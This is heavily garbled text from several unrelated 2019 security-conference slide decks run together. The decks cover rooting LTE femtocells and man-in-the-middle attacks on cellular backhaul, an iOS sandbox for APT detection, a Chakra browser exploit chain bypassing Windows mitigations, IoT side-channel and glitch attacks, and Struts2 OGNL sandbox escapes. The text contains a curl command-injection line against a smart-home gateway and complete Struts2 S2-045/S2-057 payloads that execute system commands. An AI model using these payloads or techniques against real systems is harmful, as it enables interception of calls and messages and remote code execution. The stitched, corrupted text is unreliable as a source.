1、2019山东海天软件工程专修学院4G/LTE小基站破解与中间人攻击PART 01个人简介目录CONTENTSPART 02通信安全研究趋势PART 03小基站破解PART 04回传网中间人攻击01020304PART 05安全建议05PART 02通信安全研究趋势移动通信技术的演进1G2G3G4G5G3GPP Releases4-78-9,10-1415,16Era1980s1990s2000s2010s2020sServicesAnalogVoiceDigitalVoice,Message�����sWB Voice,Packet DataVoice,Video,Internet,AppsEveryt
2、hingDevicesDa������ta Rate0100 kbps(GPRS)10 Mbps(HSPA)100+Mbps(LTE/LTE-A)10 Gbps(NR)Delay500 ms100 ms10s ms5 ms通信安全研究的发展趋势 系统化:协议标准、实现、部署、运维 端到端 全场景,复杂条件组合 模型化:协议:符号化、逻辑化 自动化:Fuzz更有效率的发掘通信安全隐患 通信协议本身:系统思考,覆盖协议本身和不同协议交互,建立符号逻辑模型,自动遍历各种组合寻找意外结果(需要建模和自动�����化工具),分析并验证(需要实验环境)。通信协议实现环节:对被测设备使用的通信协议结合应用场景建立测试用例(需要建
3、模和研发基于有限状态机的自动化工具),运行测试用例(需要实验环境)寻找意外结果,分析可能被利用的安全隐患并实际验证(需要实验环境)。工程实施与运维环节:从安全合规角度和攻击者视角建立测试用例,在工程验收时,������以及运维中应例行运行测试工具对环境进行安全评估(需要测试工具,研发测试工具需要实验环境)。通信安全研究的基础通信安全实验室 FOSS+SDR:必备 基于FOSS开发自动化测试工具和网络攻击工具 主流商用设备:对商用设备进行安全测试 演练真实商用通信网络的攻防 对商用设备进行二进制研究,制作攻击工具 主流UE:应支持5G:2020年LTE网络架构和数据流DataGTP-UUDPIPL1/L2D
4、ataSigGTP-U/GTP-CUDPIPL1/L2DataIPL1/L2PDN、IMS、InternetSigGTP-CUDPIPL1/L2S1-US5/S8SGiS11S6aDiameterSCTP/TCPIPL1/L2N�����ASRRCPDCPRLCMACPHYSGWeNBMMEPGWHSSRCPFUEGxNASS1APSCTPIPL1/L2S1-MMEDiameterSCTP/TCPIPL1/L2信令接口数据接口信令流数据流Uu通信安全实验室LTE基础版 UE:FOSS UE:PC Notebook+Ubuntu+srsUE/OAIUE+SDR(USRP B210/X310)COTS UE
5、:Android phone,iOS iPhone,4G modem eNodeB:FOSS eNodeB:PC����� Server+Ubuntu+OAI/srsLTE+SDR(USRP B210/X310)COTS eNodeB:Huawei BBU3910+pRRU3912+RHUB3908+ETP48100 COTS HeNB:ZTE、Ericsson、Comba EPC:FOSS EPC:PC Server+Ubuntu+OpenAir-CN/srsEPC/NextEPC+Kamailio/OpenIMS/Clearwater SeGW:FOSS IPSec Server:PC Server
6、+Ubuntu+Strongswan ACS:FOSS ACS:PC Server+Ubuntu+GenieACS EPC:Gigabyte Brix i7-5500,16G RAM eNodeB/RRU:UP Board+USRP B210/B200mini ThinkPad T440s+bladeRF/LimeSDR UE:Samsung,iPhone,OnePlus,ZTE,etc.LTE/4G个人实验环境132G,3G,4G混合组网的结构移动通信网主要接口和协议GTP协议消息类型值消息举例消息方向路径管理消息Echo R�����equestEcho Response隧道管理消息Create B
7、eare�������r RequestPGW-SGW,SGW-MME/S4-SGSNCreate Bearer ResponseMME/S4-SGSN-SGW,SGW-PGWModify Bearer RequestMME/S4-SGSN-SGW,SGW-PGWModify Bearer ResponsePGW-SGW,SGW-MME/S4-SGSNDelete Bearer RequestPGW-SGW,SGW-MME/S4-SGSNDelete Bearer ResponseMME/S4-SGSN��-SGW,SGW-PGW移动性管理消息Identification Request新MME/SGSN-老M
8、ME/SGSNIdentification Response老MME/SGSN-新MME/SGSNGTP-C/GTP-UUDPIPL2L1GTP-C/GTP-UUDPIPL2L1S1-U/S3/S4/S11/S12GPRS Tunneling Protocol基于UDP用于在电信网里传送网络报文������的隧道协议S1-AP协议(1)S1-APSCTPIPL2L1S1-APSCTPIPL2L1S1-MME基于SCTP,用于在基站和MME之间(S1-MME接口)的信令协议。用于实现以下功能:S1 Paging functionS1 UE Context Management functionInitial
9、 Context Setup FunctionUE Context Modification FunctionMobility Functions for UEs in ECM-CONNECTEDE-RAB Service Management functionNAS Signalling Transport functionNAS Node Selection FunctionS1-interface management functionsMME Load balancing Functi�������onLocation Reporting FunctionWarning Message Transm
10、ission functionOverload FunctionRAN Information Management FunctionS1 CDMA2000 Tunnelling functionConfiguration Transfer FunctionLPPa Signalling Transport functionTrace FunctionS1-AP协议(2)Elementary Procedure:Ini�����tiating Message:Successful���� Outcome:Unsuccessful Outcome:Response message:Response message
11、:Handover PreparationHANDOVER REQUIREDHANDOVER COMMANDHANDOVER PREPARATION FAILUREHandover Resource AllocationHANDOVER REQUESTHANDOVER REQUEST ACKNOWLEDGEHANDOV�������ER FAILUREPath Switch RequestPATH SWITCH REQUESTPATH SWITCH REQUEST ACKNOWLEDGEPATH SWITCH REQUEST FAILUREHandover CancellationHANDOVER CANC
12、ELHANDOVER CANCEL ACKNOWLEDGESAE Bearer SetupSAE BEARER SETUP REQUESTSAE BEARER SETUP RESPONSESAE Bearer ModifySAE BEARER MODIFY REQUESTSAE BEARER MODIFY RESPONSESAE Bearer ReleaseSAE BEARER R�����ELEASE COMMANDSAE BEARER RELEASE COMPLETEInitial Context SetupINITIAL CONTEXT SETUP REQUESTINITIAL CONTEXT S
13、ETUP RESPONS������EINITIAL CONTEXT SETUP FAILUREResetRESETRESET ACKNOWLEDGES1 SetupS1 SETUP REQUESTS1 SETUP RESPON�����SES1 SETUP FAILUREUE Context ReleaseUE CONTEXT RELEASE COMMANDUE CONTEXT RELEASE COMPLETEUE Context ModificationUE CONTEXT MODIFICATION REQUESTUE CONTEXT MODIFICATION RESPONSEUE CONTEXT MODIFI
14、CAT������ION FAILUREeNB Configuration UpdateENB CONFIGURATION UPDATEENB UPDATE CONFIGURATION ACKNOWLEDGEENB CONFIGURATION������ UPDATE FAILURES1-AP协议(3)Elementary ProcedureMessageHandover NotificationHANDOVER NOTIFYSAE Bearer Release RequestSAE BEARER RELEASE REQUESTPagingPAGINGInitial UE MessageINITIAL UE MESS
15、AGEDownlink NAS TransportDOWNLINK NAS TRANSPORTUplink NAS TransportUPLINK NAS TRANSPORTNAS non delivery indicationNAS NON DELIVERY INDICATIONError IndicationERROR INDICATIONUE Context Release RequestUE CONTEXT REL�����EASE REQUESTDownlinkS1 CDMA2000 TunnelingDOWNLINK S1 CDMA2000 TUNNE������LINGUplink S1 CDMA20
16、00 TunnelingUPLINK S1 CDMA2000 TUNNELINGUE Capability Info IndicationUE CAPABILITY INFO INDICATIONeNB Status TransfereNB STATUS TRANSFERMME Status T�����ransferMME STATUS TRANSFERDeactivate TraceDEACTIVATE TRACETrace StartTRACE STARTTrace Failure IndicationTRACE FAILURE INDICATIONLocation Reporting Contr
17、olLOCATION REPORTING CONTROLLocation Reporting Failure IndicationLOCATION REPORTING FAILURE INDICATIONLocation ReportLOCATION REPORTDiameter协议命令名称缩写 命令码Update-Location-RequestULR316Update-Location-AnswerULA 316Cancel-Location-RequestCLR317Cancel-Location-AnswerCLA317Authenticati���on-Information-Reques
18、tAIR318Authentication-Information-AnswerAIA318Insert-Subscriber-Data-RequestIDR319Insert-Subscriber-Data-AnswerIDA319DiameterSCTPIPL2L1DiameterSCTPIPL2L1S6a/GxDiameter协议,基于SCTP,是用于AAA(鉴权、认证和计费)的基本协议和一组应用。基本协议提供可靠传输、消息传送和差错处理的基本机制。Diameter协议用于PGW与PCRF之间,用于传递用户������的Qos规则以及计费规则。Diameter协议用于MME与HSS之间完成鉴权、授权
19、、位置管理以及用户数据管理等功能,主要消息包括:鉴权消息,完成用户合法性检查。位置更新消息,记录或更新用户的位置信息。HSS发起清除MME中的用户记录。HSS发起的插入用户签约数据�������。HSS发起删除MME中保存的所有或者部分用户数据。MME通知HSS删除去附着用户的签约数据和MM上下文。当用户状态变化、终端改变或者用户当前APN(接入点名)的P-GW信息改变时,MME向HSS发通知请求消息。越来越小的基站为什么要研究小基站 5G将带来大量的小基站 小基站的安全性不强 小基站易受攻击为什么要研究回传网(backhaul)回传网的安全性一直未受重视 回传网易于物理接触 回传网被攻击的危害很大为什么要
20、研究和实现中间人攻击 中间人攻击能方便的监听、篡改、仿冒通信内容 中间人攻击是更高级更深入的攻击的基础 能实现对特定目标的中间人攻击是掌控通信网的标识移动通信网的攻击面 空中接������口()接入网()核心网()运营商互联()Modem基带 厂商OTA WiFi/BT基带 SIM卡 IPv6 WiFi网络基于4G/LTE����的中间人攻击 目的:短信:侦听,必要时截留、篡改或仿冒短信;电话:侦听,必要时拦截或仿冒电话通话;数据:侦听,必要时屏蔽、篡改或仿冒数据通信内容。实现方式:空口:基于伪基站的LTE中继+报文篡改(aLTEr)基于子帧信号覆盖的报文篡改(SigOver)接入网:基于破解基站系统+Netfi
21、lter实现中间����人攻击 �������基于回传网植入设备实现中间人攻击(Hacking Box of S1)LTE空口(Air Interface)攻击的基础技术 LTE Relay 跟踪每个用户的通信报文 User Plane报文篡改 SigOver子帧信号覆盖 EIA0 伪基站+信令网 FemtoCell RRC重定向 UE sends RRC connection request(with TMSI)C-RNTI used to filter out this specific request Find uplink transmission with the corresponding C-RNTI
22、 Match the C-RNT��������I and the TMSI追踪特定UE的通信过程1.部署一个LTE中继,一端扮演目标手机连接现网基站,一端扮演现网基站吸附目标手机,两端之间可异地通过互联网中继。2.可成功完成目标手机和现网基站的双向认证。3.手机和基站之间的用户数据报文,使用ZUC或AES-CTR加密,两种加密方式都是基于密码�������流的XOR。4.LTE中继判断出DNS请求报文,修改DNS服务器地址为预先架设的恶意DNS,再调整报文的某些字段使报文校验和为正常。之后,将修改后的报文发给现网基站。5.收到现网基站的DNS响应报文后,修改报文源IP地址为原DNS服务器,之后,将修改后的报文发给目标手机
23、。篡改报文,实现基于DNS的中间人攻击1.克隆附近某个现网基站,包括TAC和PCI,保持时钟同步,但不发射信号2.跟踪该现网基站与UE的通信过程,并在特定时刻发射信号,注入组装好的子帧(Subframe)3.在发射信号强度远高于现网基站的情况下,可实现子帧信号覆盖(Signal Overwrite)4.子帧覆盖可实现报文篡改5.在满足预知目������标手机(或基站)的接收子帧和加密方式的前提下,可用来进行中间人攻击子帧信号覆盖,实现报文篡改子帧信号覆盖(SigOver),攻击成功率高LTE空口攻击小结 被动式:Sniffing:无加密/密钥来自核心网/密钥来自SIM卡 主动式:中间人攻击:Femto C
24、ell/Small Cell/伪基����站 中间人攻击:LTE Relay+加密报文篡改/EIA0 半主动式:SigOver:子帧信号覆盖接入网(RAN)的安全隐患和攻击方法 eNodeB 易于物理接触 默认LMT密码 可二进制,注入程序到文件系统 HeNB 易于物理接触 皆可root 更改Firmware 回传网 多数没有IPSec保护,明文窃听 可中间人攻击基站的类型基站的类型 小基站:Small Cell=Pico Cell+Femto Cell缺乏物理保护的宏站(Macro Cell)随身携带的宏站渗透工具 华为BBU本地管理电缆 华为随身路由器WiFi2 Pro GPD Win掌����上电脑PA
25、RT 03小基站破解一切Femto Cell都可破解为什么重视小基站(Small Cell)的安全 5G网络运行于较高频段,传统宏基站穿透能力减弱,小基站将用来弥补宏基站覆盖不足的地方 4G网络已存在大量小站,用于深度室内覆盖,数量超过150万台 5G会部署更多的小站,可能一户一站,呈现替代WiFi的态势 小站离用户近,易于物理接触和破解破解小基站后能看到什么-短信 SMS over NAS破解小基站后能看到什么-短信 SMS over IMS破解小基站后能看到什么-VoLTE通话 SIP AMR破解小基站后能看������到什么-数据通信 GTP-U破解小基站后能看到什么�������-个人信息 IMSI 针对VoL
26、TE 附近人的手机号码MSISDN IMEI Cell-ID IP 位置信息 高级版的IMSI Catcher支持LTE的PicoCell爱立信ENC-nRBS01完全无须破解的爱立信ENC-nRBS01支持LTE的PicoCell京信ENB-35破解后的京信ENB-35支持LTE的PicoCell中兴BS8102破解后的中兴BS8102支持LTE的PicoCell华为BTS3203支持LTE的PicoCell大唐fbs3211/3221网购FemtoCell(1)中国移动:GSM:京信HNB-10 TD-SCDMA:京信HNB-33、博威HN1200 TD-LTE:中兴BS810�������2 T230
27、0、京信ENB-35、华为BTS3203、大唐fBS3211、爱立信ENC-nRBS01、邦讯BSNAP-300三元达LNC-2000E、三维SeNB������2001网购FemtoCell(2)中国联通:WCDMA:华为UAP2105/UAP2816/UAP283�����5/ePico3801/ePico3802 FDD LTE:中兴BS8102 L1800/L2100网购FemtoCell(3)中国电信:CDMA:华为ePico3680 FDD LTE:中兴BS8102 L1800Root FemtoCell 选购能正常工作的3G/4G FemtoCell SeGW/SIM卡失效的FemtoCell可能有老
28、版本的Firmware�������� 获得root权限 破解IPSec 侦听往来通信 对往来通信实施中间人攻击 连入运营商核心网,实施信令攻击Root FemtoCell的硬件工具(1)数字万用表 CP2102 杜邦线 SEGGER J-Link 热风焊台Root FemtoCell的硬件工具(2)BUS Pirate JTAGulator NAND/NOR Flash 读写器+TSOP48/56座Root FemtoCell的软件工具TR-069服务器:GenieACS、XACS上传Firmware、更新到旧版本/修改过的Firmware上传/修改某些配置IDA Pro、GhidraQEmuOpenOCD
29、Binwalkfirmware-mod-kit十������六进制编辑器破解小基站后实施中间人攻击 攻击程序运行于小基站 隐蔽,不宜被察觉 小基站配置低,CPU、内存、存储空间均受限 小基站启用IPSec情况下的一种折中选择 攻击程序运行于回传网上的植入设备 小基站启用IPSec,则需要先实现IPSec的中间人 可实现相对复杂的中间人攻击 可运行用于中间人攻击的各种应用服务器 基于DNS和IP,把连接重定向到预先架设的攻击服务器便携的小基站,随身携带,随时展开攻击 保持便携,可放入背包 移动供电,12V 互联网接入 随身WiFi路由器:带RJ-45接口,华为WiFi2 Pro 回程网接入点:需互联网可访问
30、PART 04回传网中间人攻击小基站的回传网(Backhaul)基于xPON(GPON,EPON)双绞线到ONU 基于PTN、IP RAN 光纤 双绞线到光纤收发器 基于Internet 双绞线回传网上的协议 用户数据:GTP-U 信令:SCTP S1-AP协议,从eNodeB连接MME 网管运维数据:HTTP 可能被IPSec保护(从eNodeB到SeGW),不常见Com���������municatingNodesProtocolProtocolPortsSourceDestinationSourceDestinationeNodeBS-GWGTP-U/UDP21522152S-GWeNodeBGTP-U
31、/UDP21522152eNodeBeNodeBGTP-U/UDP21522152eNodeBMMES1AP/SCTP3641236412MMEeNodeBS1AP/SCTP3641236412eNodeBeNodeBX2AP/SCTP3641236412我们关注的LTE协议和端口回传网的安全隐患 IPSec�������是可选的。3GPP TS 33.401:In case the S1 management plane interfaces are trusted(e.g.physically protected),the use of protection based on IPsec/IKEv2 o
32、r equ������ivalent mechanisms is not needed 问题在于:ONU之前的传输链路是不安全的。实践中,绝大多数基站未启用IPSec(加密和双向认证)。回传网上的中间人攻击程序 植入于回程链路上的一台双网口设备�������� 对用户数据(GTP-U)的中间人攻击:包含VoLTE短信和通话 对信令(S1AP)的中间人攻击:包含短信(SMS over NAS)基站接入代理,可接入多台伪基站,信令聚合后核心网无法察觉回传网上的中间人攻击:用户数据 GTP-U的解包,打包 TEID和用户的对应 一种MEC的实现方式回传网上的中间人攻击:信令 S1-AP协议 SCTP的代理 SCTP的聚合回传网
33、上的植入物(Hacking Box of S1)双千兆网卡 带USIM槽 可通������过4G模块远程访问,可接入多台基站 12V直流供电 运行S1中间人攻击程序Hacking Box of S1的两种模式 透明模式:可实现中间人攻击 不需要修改eNodeB的配置 不支持接入多台eNodeB 不支持IPSec 网关模式:可实现更复杂的中间人攻击 要求能修改eNodeB的配置,将MME的IP地址改为HBOS的IP 相当于S1-AP信令网关,支持多eNodeB接入 将多条SCTP连接汇聚成一条,只注册一次eNodeB,核心网只看到1台eNodeB 可支持IPSecDemoPART 05安全建议安全建议:小基
34、站的安全加固 回传网的安全谢谢观看演讲人:Seeker2019 美团 APT检测设备的扩展研究 团队介绍 朱学文(Ju Zhu)美团/高级安全研究员 9+年的安全研究经验 7+年主要从事高级威胁的研究,包括0Day、nDay和漏洞挖掘 一直致力于使用自��������动化系统来Hunt野外的高级威胁 多次获得CVE,且受到Google、Apple、Facebook等厂商的致谢 多次作为Speaker受邀参加BlackHat、CodeBlue、CSS等国内外的顶级安全会议 郭梦圆(Mabel Guo)上海交通大学/美团实习安全研究员 上海交通大学在读硕士 研究生阶段致力于视频隐写/隐写分析研究 擅长iOS逆向以
35、及虚拟化技术 PART 01 设备选型对比 目录 CONTENTS PART 02 解决方案对比 PART 03 iOS动态沙箱 PART 04 一些实践 01 02 03 04 PART 01 业界主流APT检测设备的选型对比 业界主流APT检测设备的选型对比 概述 平台支持性 文件类型支持性 内网接入设备类型统计 BYOD(Bring Your Own Device)业界主流APT检测设备的选型对比 �������平台支持性 Windows MacOS iOS Android 其它其它 厂商厂商1 厂商厂商2 厂商厂商3 Win7、Win10、。32位、64位 自定义导入 业界主流APT检测设备的选型对
36、比 文件类型支持性 PE Office PDF Mach-O plist APK 厂商厂商1 厂商厂商2 厂商厂商3 Mach-O 虚拟内存VMP属性 导入相关依赖库 模拟实现(比如Foundation.framework)运行 找到入口地址(比如main函数)Load Commands-LC_MAIN 绝对地址=入口地址 +slide+text_vm_addr 地址(Rebase数据)修正 Lazy Symbol Pointer、CFString 原数据(Pointer)新数�������据(Pointer)Lazy Symbol Pointer 0 x1�������00007F9C-slide+0 x100007F
37、9C CFString 0 x100007FA8-slide+0 x100007FA8 地址(API)重定向 Lazy Symbol Pointer数据 NSLoglibFoundation.so���� API重定向流程 完整运行流程 回调流程 部署 更好适配 ODM(Original Design Manufacturer)PART 04 一些实践 谢谢观看 演讲人:朱学文(Ju Zhu)?0?WHO AM I?CONTENTS1?Chakra vulnerability2?Bypass ASLR&DEP3?Bypass CFG4?Bypass CIG5?Bypass ACG6?Exploit7?
38、Q&A?The vulnerability was discovered on May 31,2016.The vulnerability was fixed in February 2017.?NativeIntArray struct:NativeIntArrayHeadSegment:leftlengthsizeNext segmentheadSegment:leftlengthsizeNext segmentBufferBufferlength?NativeIntArray struct:?Make va������r_Array_1 object reach a special stat����e.Ma
39、ke var_Array_1-length smaller.?Make var_Array_1 object reach a special state.Array.length (head.next.left+head.next.length)0 x2e(0 x03d2 +0 x2e)Segment:he�����adLeft:0 x00000000Length:0 x00000000Size:0 x00000012Next segmentSegment:head.nextLeft:0 x000003d2Length:0 x0000002eSize:0 x0000002eNext segmentBuf
40、fer:0 x00000012*4Buffer:0 x0000002e*4NativeIntArrayHeadheadLength:0 x0000002e?Make var_Array_1 object reach a special state.Array.length (head.next.left+head.next.length)0 x2e(0 x03d2 +0 x2e)?Make var_��������������Array_1 object reach a special state.?Callback function causes length to be modified.But the Revers
41、eHelper function still uses the old length.?Segment:headLeft:0 x00000000Length:0 x00000000Size:0 x00000012Next segment�������Segment:head.nextLeft:0 x000003d2Length:0 x0000002eSize:0 x0000002eNext segmentBuffer:0 x00000012*4Buffer:0 x0000002e*4NativeIntArrayHeadheadLength:0 x0000002eMake var_Array_1 object
42、 reach a special state.Array.length (head.next.left+head.next.length)0 x2ehead.size smaller.?step 1var_Array_1-head.size:0 x2e-0 x23var_Array_1-head.size:0 x�����23 head.length:0 x2eSegment:headLeft:0 x00000000Length:0 x0000002eSize:0 x00000023Next segmentSegment�����:head.nextLeft:0 x00000023Length:0 x000000
43、0bSize:0 x00000012Next segmentBuffer:0 x0000002e*4Buffer:0 x00000012*4NativeIntArrayHeadheadLength�����:0 x0000002e?step 1var_Array_1-head.size:0 x2e-0 x23����var_Array_1-head.size:0 x23 head.length:0 x2e?step 1seg-left=0seg-EnsureSizeInBound():seg.size=0 x23?step 1Min(Next-left,Size)-Min(0 x2e,0 x23)?step 1
44、var_Array_1-head.size:0 x2e-0 x23var_Array_1-head.size:0 x23 head.length:0 x2eSegment:headLeft:0 x00000000Length:0 x0000002eSize:0 x00000023Next segmentSegment:head.nextLeft:0 x00000023Length:0 x0000000bSize:0 x00000012Next segmentBuffe�������r:0 x0000002e*4Buffer:0 x00000012*4NativeIntArrayHeadheadLength:
45、0 x0000002e?Step 2Create OOB?Step 2ConvertToJavascriptArray:Create new segmentSeg.buffer=0 x23*0 x08,Seg.length=0 x2eSegment:head OOBLeft:0 x00000000Length:0 x0000002eSize:0 x00000023Next segmentSegment:head.nextLeft:0 x00000023Length:0 x0000000bSize:0 x00000011Next segmentOO��������B:0 x0b*0 x08Buffer:0 x0
46、0000011*4JavascriptArrayHea�����dheadLength:0 x0000002eBuffer:0 x00000023*8?Step 2Seg.buffer=0 x23*0 x08;Seg.length=0 x2e;?Step 3Segment layoutArray 1 Segment:headLeft:0 x00000000Length:0 x0000002eSize:0 x00000023Next segmentBuffer:0 x00000023*8Array 2 Segment:headLeft:0 x00000023Length:0 x0000000bSize:0
47、 x23OOB Write?Step 3Segment layout and segment OOB?Step 4Edit var_Array_2.head.sizeArray 1 Segment:headLeft:0 x00000000Length:0 x0000002eSize:0 x00000023Next segmentBuffer:0 x00000023*8Array 2 Segment:headLength:0 x0000000bSize:0 xffffffffOOB WriteLeft:0 x00000023?Ste�����p 4Edit var_Array_2.head.size?Ar
48、ray 1 Segment:headLeft:0 x00000000Length:0 x0000002eSize:0 x00000023Next segmentBuffer:0 x000��������00023*8Array 2 Segment:headLength:0 x0000000bSize:0 xffffffffLeft:0 x00000023Segment:head.nextLeft:0 x00000023Length:0 x0000000bSize:0 x00000011Next segmentBuffer:0 x00000011*40 x7fffffff?Step 5var_Array_2 O
49、OB r/wArray 2 Segment:headLeft:0 x00000000Length:0 x0000000bSize:0 xffffffffNext segmentBuffer:0 x00000023*8OOB 0 xffffffff*8?Step 5var_Array_2 OOB r/w?Step 6Fill Memory r/wInline HeadEdit NativeIntArray.length,NativeIntArray.head.length,NativeIntArray.size?Step 6Fill Memory r����/wInline HeadEdit Nativ
50、eIntArray.length,NativeIntArray.head.length,NativeIntArray.sizememoryOOB segmentNativeIntArrayobjectedit array.lengtharray.head.sizearray.head.lengthout of bound memory read/write?Step 6Fill M����emory r/wDataView?Step 6Fill Memory r/wDataView?Step 6Fill Memory r/wDataView?Step 6Fill Memory r/wDataView?
51、Step 6Fill Memory r/wDataView?CONTENTS1?Chakra vulnerability2?Bypass ASLR&DEP3������?Bypass CFG4?Bypass CIG5?Bypass ACG6?Exploit7?Q&A?Module address and object address?Module address and object address?ROP?VirtualProtect?VirtualAlloc?BB?C?(DC(?A?:?EC?M?G?I?.?C?BB?C?(DC(?1?B?BB?C?(DC(?D?CE?I?OC?D?)?G.!?C?4
52、14?5443?6?I?CA?6?21?1C(?A?:?EC?M?G?I?.?C?BB?C?(DC(?1?B?BB?C?(DC(?D?������CE?I?OC?D?)?G.!?C?414?5443?6?I?CA?6?21?1?0?3?1?CONTENTS1?Chakra vulnerability2?Bypass A�������SLR&DEP3?Bypass CFG4?Bypass CIG5?Bypass ACG6?Exploit7?Q&A?Control Flow Guard(CFG);=C?4?!?4?/;=C?4?!?4?/?4?C?A?:?A?=?;=C?4?!?4?:?000?0?4?0?:0?A?A?:
53、?:?A4,?4?:+?4A;=C?4?!?4?:?4?;=C?4?!?4?/?:?=?A?4?/?Control Flow Guard(CFG)bitmapindex offset :data0 x�������0077b960 0 x01dee58c:0������ x555555550 x0077b964 0 x01dee590:0 x300105550 x0077b968 0 x01dee594:0 x04541041bt:0 x30010555&0 x400!=000000100 00000000=0 x40001010=0 x0a=10Functionaddress:0 x77b964500 x77b964
54、50:01110111 10111001 01100100 01010000?Leak stack address?Finding the return address of a specific function.?Modify the functions return address.?Control RIP.?CONTENTS1?Chakra vulnerability2?Bypass ASLR&DEP3?Bypass CFG4?Bypass CIG5?Bypass ACG6?Exploit7?Q&A?Code Integrity Gua�������rd(CIG)Only properly sign
55、ed�������� DLLs are allowed to load by a processus-14-Yu-Write-Once-Pwn-Anywhere?“LoadLibrary”in ShellCodeLoad DLL file into MemoryParse PE header Reload s������ectionsFix Import TableRebaseElevation of privilege is Quite ComplexShellcode reusableIncrease privileges and Escape SandBox can be in a DLL?CONTENTS1?Ch
56、akra vulnerability2?Bypass ASLR&DEP3?Bypass CFG4?Bypass CIG5?Bypass ACG6?Exploit7?Q&A?Two general ways load malicious native code into memoryLoad malicious DLL/EXE from diskDynamic generate �����code CIG block the first wayOnly properly signed DL�������Ls are allowed to load by a processChild process can not be
57、 created(Windows 10 1607)ACG block the second wayCode pages are immutableNew,unsigned code cannot be created?Arbitrary Code Guard(ACG)?Leverage valid signed code in an unintended wayROP(Retu������rn oriented programming)It could construct a full payload?Call API Function?ExampleNo need of shellcodeJust li
58、ke C code?ExampleNo need of shellcodeJust like C code?CONTENTS1?Chakra vulnerability2?Bypass ASLR&DEP3?Bypass CFG4?Bypass CIG5?Bypass ������ACG6?Exploit7?Q&A?Demo?CONTENTS1?Chakra vulnerability2?Bypass ASLR&DEP3?Bypass CFG4?Bypass CIG������5?Bypass ACG6?Exploit7?Q&A?https:/IOT安全-测信道实战2019议程.测信道的那点事.测信道案例简析.测信道
59、Power Analysis测信道的那点事测信道攻击是一种针对软件或硬件设计缺陷������,剑走偏锋的攻击方式攻击途径通常采用被动式监听,或通过特殊渠道发送隐蔽数据信号攻击点不在暴力破解,而是通过功耗;时序;电磁泄漏等方式达到破 解 目 的.在 很 多 物 理 隔 绝 的 环 境 中,往 往 也 能 出 奇 制 胜测信道测信道.Public key signature check.Bootloader 加固(bootdelay=0).屏蔽调试端口 UART;JT������AG;SPI;I2C .电子设备全部物理隔离(Air Gapping)测信道 WordPress测信道 Drupal测信道门禁 测信道门禁 被动
60、式:声波信号采集还原打印机原文:美国 NSA 电磁波监听(TEMPEST):功耗分析破解南韩公交卡密钥系统�������(3DES):功耗分析获取 Philipe Hue 智能灯系统密钥(AES)主动式:Xbox360 Glitch 攻击(运行 unsigned code):智能网关 Hue NAND Glitch(得到 Root 权限):通过毛刺注入成功获取硬件钱包 Trezor 闪存敏感信息:以色列 Ben-Gurion 大学通过 USB 发送电磁信号(USBee)测信道案例简析时耗分析时耗分析NAND-G��������litchNAND-Glitch物联网设备网关(WinkHub)通过网页对其进行访问(set_de
61、v_value.php)curl“192.168.01/set_dev_value.php”-d“nodeId=a&attrId=;uname-a;”NAND-Glitch.NAND Flash 通常存储固件;Bootloader;内核以及root files.使用数据线在系统启动,读取 NAND 内核信息瞬间,短接 I/O pin.在正确的时间点,阻止 Bootloader 读取正确的内核数据从而进入 shell 模式NAND-Glitch测信道 Power Analysis功耗分析.Power analysis(Simp������le&Differen�����tial).处理器运行不同指令在功耗需求上也不近
62、相同.需要了解目标设备所采用的加密算法.信号的�����采集必须在加密或解密的过程中完成功耗分析功耗分析(ChipWhisperer).Colin OFlynn 设计制作,学习 SCA 功耗分析和毛刺注入神器.基于Python 跨平台开源软硬件项目������(Windows;Linux;MacOS).可用于时序或电压毛刺注入攻击测试,产生 无限循环).寻找目标设备在特定时刻(加密/解密)功耗图形的差异功耗分析(SPA)功耗分析(DPA)目标设备测量方法测量结果功耗分析(DPA)功耗分析(DPA)功耗分析(AES-128)功耗分析(DPA)功耗分析(电磁信号).电磁波可通过 H 探头和软件无线电设备远程获取.芯片0
63、1转换产生电磁波从空气中泄漏,其中包含密 钥指纹信息.Tel Aviv 大学科研人员通过测量分析电磁发射获取 GnuPG 密钥信息功耗分析(电磁信号)功耗分析(DPA)One More Thing.测信道 EMFI测信道 EMFI测信道 EMFI测信道 EMFI测信道 EMFISummarySummary百分百安全的系统并不存在边信道分析与防御,硬件安全必备技能完美的设计,实施过程中百密疏,将导致系统完全崩溃谢谢观看?PART 01?CONTENTSPART 02?PART 03?PART 04?01020304?P������ART 01?1?2?3?1?SecurityManager?2?3?Secu
64、rityManager?PART 02?SecurityMemberAccessconstant name=struts.excludedClassesvalue=java.lang.Object,java.lang.Runtime,java.lang.Syste������m,java.lang.Class,java.lang.ClassLoader,java.lang.Shutdown,java.lang.ProcessBuilder,ognl.OgnlContext,ognl.ClassResolver,ognl.TypeConverter,ognl.MemberAccess,ognl.Defaul
65、tMemberAccess,com.opensymphony.xwork2.ognl.SecurityMemberAccess,com.opensymphony.xwork2.ActionContext/1?2?isAccessible?3?struts-default.xmlStruts�����2S2-001S2-014S2-032S2-045S2-057(#p=new java.lang.ProcessBuilder(calc).(#p.start()(#_memberAccessallowStaticMethodAccess=true).(java.lang.RuntimegetRuntime(
66、).exec(calc)(#container=#contextcom.opensymphony.xwork2.ActionContext.container).(#ognlUtil=#container.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass).(#ognlUtil.excludedClasses.clear().(#ognlUtil.excludedPackageNames.clear().(#context.setMember�������Access(ognl.OgnlContextDEFAULT_MEMBER_ACCESS).(
67、java.lang.RuntimegetRuntime().exec(calc)(#_memberAccess=ognl.OgnlContextDEFAULT_ME�������MBER_ACCESS).(java.lang.RuntimegetRuntime().exec(calc)S2-045 PAYLOAD$(#c=#requeststruts.valueStack.context).(#container=#ccom.opensymphony.xwork2.ActionContext.container).(#o=#container.getInstance(com.opensymphony.xwo
68、rk2.ognl.OgnlUtilclass).(#o.getE�������xcludedClasses().clear().(#o.getExcludedPackageNames().clear().(#dm=ognl.OgnlContextDEFAULT_MEMBER_ACCESS).(#c.setMemberAccess(#dm).(#cmd=(calc).(new java.lang.ProcessBuilder(#cmd).start()S2-057 PAYLOADpublic class OgnlContext extends Object implements Mappublic stati
69、c final String CONTEXT_CONTEXT_KEY=context;public static final String ROOT_CONTEXT_KEY=root;public static final String THIS_CONTEXT_KEY=this;public static f��������inal String MEMBER_ACCESS_CONTEXT_KEY=_memberAccess;public class OgnlContext extends Ob����ject implements Mappublic static final String ROOT_CONTEX
70、T_KEY=root;public static final String THIS_CONTEXT_KEY=this;S2-045S2-057?Ognl?Ognl?S2-057?(#c=#requeststruts.valueStack.context).(#container=#ccom.opensymphony.xwork2.ActionContext.con�����tainer).S2-045?(#container=#contextcom.opensymphony.xwork2.ActionContext.con�����tainer)1?#context?2?request.getAttribute
